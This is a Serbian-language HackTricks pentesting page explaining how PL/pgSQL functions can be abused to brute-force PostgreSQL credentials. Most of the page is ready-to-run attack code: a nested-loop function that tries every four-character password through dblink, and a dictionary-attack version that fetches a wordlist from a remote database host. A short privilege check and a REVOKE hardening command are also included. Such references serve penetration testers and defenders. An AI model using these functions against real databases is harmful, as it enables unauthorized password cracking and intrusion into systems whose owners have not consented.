Serbian - Ht
HackTricks Training Twitter Linkedin Sponsor

PL/pgSQL Password Bruteforce

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Pronađite više informacija o ovom napadu u originalnom radu.

PL/pgSQL je potpuno opremljen programski jezik koji prevazilazi mogućnosti SQL-a nudeći unapređenu proceduralnu kontrolu. Ovo uključuje korišćenje petlji i različitih kontrolnih struktura. Funkcije kreirane u jeziku PL/pgSQL mogu biti pozvane SQL naredbama i okidačima, proširujući opseg operacija unutar baze podataka.

Možete zloupotrebiti ovaj jezik kako biste zatražili od PostgreSQL-a da brute-force napadne korisničke akreditive, ali oni moraju postojati u bazi podataka. Možete proveriti da li postoji koristeći:

SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
lanname | lanacl
---------+---------
plpgsql |

Po defaultu, kreiranje funkcija je privilegija koja je dodeljena javnosti (PUBLIC), gde PUBLIC se odnosi na svakog korisnika u tom sistemu baze podataka. Da bi se to sprečilo, administrator bi mogao da povuče privilegiju USAGE iz domena PUBLIC:

REVOKE ALL PRIVILEGES ON LANGUAGE plpgsql FROM PUBLIC;

U tom slučaju, naš prethodni upit bi prikazao različite rezultate:

SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
lanname | lanacl
---------+-----------------
plpgsql | {admin=U/admin}

Napomena da bi sledeći skript radio, funkcija dblink mora postojati. Ako ne postoji, možete pokušati da je kreirate sa

CREATE EXTENSION dblink;

Brute Force napad na lozinke

Evo kako možete izvršiti Brute Force napad na lozinke sa 4 karaktera:

//Create the brute-force function
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
username TEXT, dbname TEXT) RETURNS TEXT AS
$$
DECLARE
word TEXT;
BEGIN
FOR a IN 65..122 LOOP
FOR b IN 65..122 LOOP
FOR c IN 65..122 LOOP
FOR d IN 65..122 LOOP
BEGIN
word := chr(a) || chr(b) || chr(c) || chr(d);
PERFORM(SELECT * FROM dblink(' host=' || host ||
' port=' || port ||
' dbname=' || dbname ||
' user=' || username ||
' password=' || word,
'SELECT 1')
RETURNS (i INT));
RETURN word;
EXCEPTION
WHEN sqlclient_unable_to_establish_sqlconnection
THEN
-- do nothing
END;
END LOOP;
END LOOP;
END LOOP;
END LOOP;
RETURN NULL;
END;
$$ LANGUAGE 'plpgsql';

//Call the function
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');

Napomena da čak i pokušaj brute-force napada sa 4 karaktera može trajati nekoliko minuta.

Takođe možete preuzeti wordlistu i isprobati samo te lozinke (napad rečnikom):

//Create the function
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
username TEXT, dbname TEXT) RETURNS TEXT AS
$$
BEGIN
FOR word IN (SELECT word FROM dblink('host=1.2.3.4
user=name
password=qwerty
dbname=wordlists',
'SELECT word FROM wordlist')
RETURNS (word TEXT)) LOOP
BEGIN
PERFORM(SELECT * FROM dblink(' host=' || host ||
' port=' || port ||
' dbname=' || dbname ||
' user=' || username ||
' password=' || word,
'SELECT 1')
RETURNS (i INT));
RETURN word;

EXCEPTION
WHEN sqlclient_unable_to_establish_sqlconnection THEN
-- do nothing
END;
END LOOP;
RETURN NULL;
END;
$$ LANGUAGE 'plpgsql'

-- Call the function
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
Previousdblink/lo_import data exfiltrationNextNetwork - Privesc, Port Scanner and NTLM chanllenge response disclosure

Last updated